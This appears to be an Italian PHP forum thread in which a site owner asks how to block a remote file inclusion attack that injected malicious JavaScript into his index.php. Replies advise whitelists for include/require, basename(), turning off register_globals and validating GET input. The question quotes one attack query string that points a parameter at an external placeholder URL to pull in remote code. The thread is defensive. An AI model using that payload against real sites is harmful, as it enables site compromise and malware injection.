ciao,
vorrei sapere come fare a proteggersi da intrusioni tipo
pagina.php?art=valorenumerico/index.php?act=http://urlesternoperintrusione/pagina.txt
normalmente utilizzavo mysql_escape_string, ma in questo caso non serve, c'è un modo concreto per proteggere le pagine?
grazie
E' sufficiente utilizzare una whitelist per eventuali chiamate ad include/require che utilizzano i dati di input per selezionare il file da includere oppure utilizzare funzioni tipo basename() per assicurarsi che il file che verrà incluso sia locale e non remoto.
non ci siamo capiti, il valore GET io lo passo ad una query, a tale valore, per cercare di bucare il sito aggiungono questa parte /index.php?act=http://urlesternoperintrusione/pagina.txt[B]
e tramite quel codice inseriscono i soliti js malevoli in fondo alla pagina principale (index.php)
non richiamo file tramite get, sono loro che sfruttano il get per inserire i loro codici
utilizzare post e mettere su off register_globals
utilizzi espressioni regolare per filtrare $_GET, per ogni campo verifica anche che sia del tipo che ti aspeti, ex valore intero, valore numerico, alfanumerico, link ecc ecc
ciAo
Potresti spiegarmi come fa la pagina index.php ad includere il codice malevoro a partire da una querystring contenente act=http://urlesternoperintrusione/pagina.txt ?
L'unico metodo che mi viene in mente è tramite include/require o file_get_contents() oppure se il valore $_GET['act'] viene utilizzato nell'attributo SRC di IFRAME, SCRIPT etc.
In tutti i casi menzionati, l'utilizzo di una whitelist o di basename() etc. dovrebbero aumentare sensibilmente la sicurezza dello script.
Se conosci altri metodi per effettuare l'injection che non possono essere bloccati tramite whitelist/basename() desidererei tu li descrivessi.
filippo scusa una domanda, ma cos intendi per whitelist? un elenco dei file "caricabili" ?Originariamente inviato da filippo.toso
whitelist/basename()
ciAo
Si. Quando si utilizza include()/require() utilizzando dati di input (es. un parametro "action") sarebbe sempre opportuno istituire una whitelist (es. un array) da utilizzare per "autorizzare" l'include. In questo modo se un attaccante cerca di includere un file non elencato esplicitamente nella lista, l'include non verrà eseguito.filippo scusa una domanda, ma cos intendi per whitelist? un elenco dei file "caricabili" ?
ok grazie!Originariamente inviato da filippo.toso
Si. Quando si utilizza include()/require() utilizzando dati di input (es. un parametro "action") sarebbe sempre opportuno istituire una whitelist (es. un array) da utilizzare per "autorizzare" l'include. In questo modo se un attaccante cerca di includere un file non elencato esplicitamente nella lista, l'include non verrà eseguito.
ciAo
non ne ho idea, ma secondo il mio provider (e guardando i log hanno ragione, coincide l'ora dell'ultima modifica) è il metodo con cui mi hanno inserito un codice php che stampa un js malevoloOriginariamente inviato da filippo.toso
Potresti spiegarmi come fa la pagina index.php ad includere il codice malevoro a partire da una querystring contenente act=http://urlesternoperintrusione/pagina.txt ?
L'unico metodo che mi viene in mente è tramite include/require o file_get_contents() oppure se il valore $_GET['act'] viene utilizzato nell'attributo SRC di IFRAME, SCRIPT etc.
In tutti i casi menzionati, l'utilizzo di una whitelist o di basename() etc. dovrebbero aumentare sensibilmente la sicurezza dello script.
Se conosci altri metodi per effettuare l'injection che non possono essere bloccati tramite whitelist/basename() desidererei tu li descrivessi.
non ho valori $_GET['act'] nel mio codice
comunqu mi informo sulle funzioni che hai menzionato
Permessi di invio
Rispondi quotando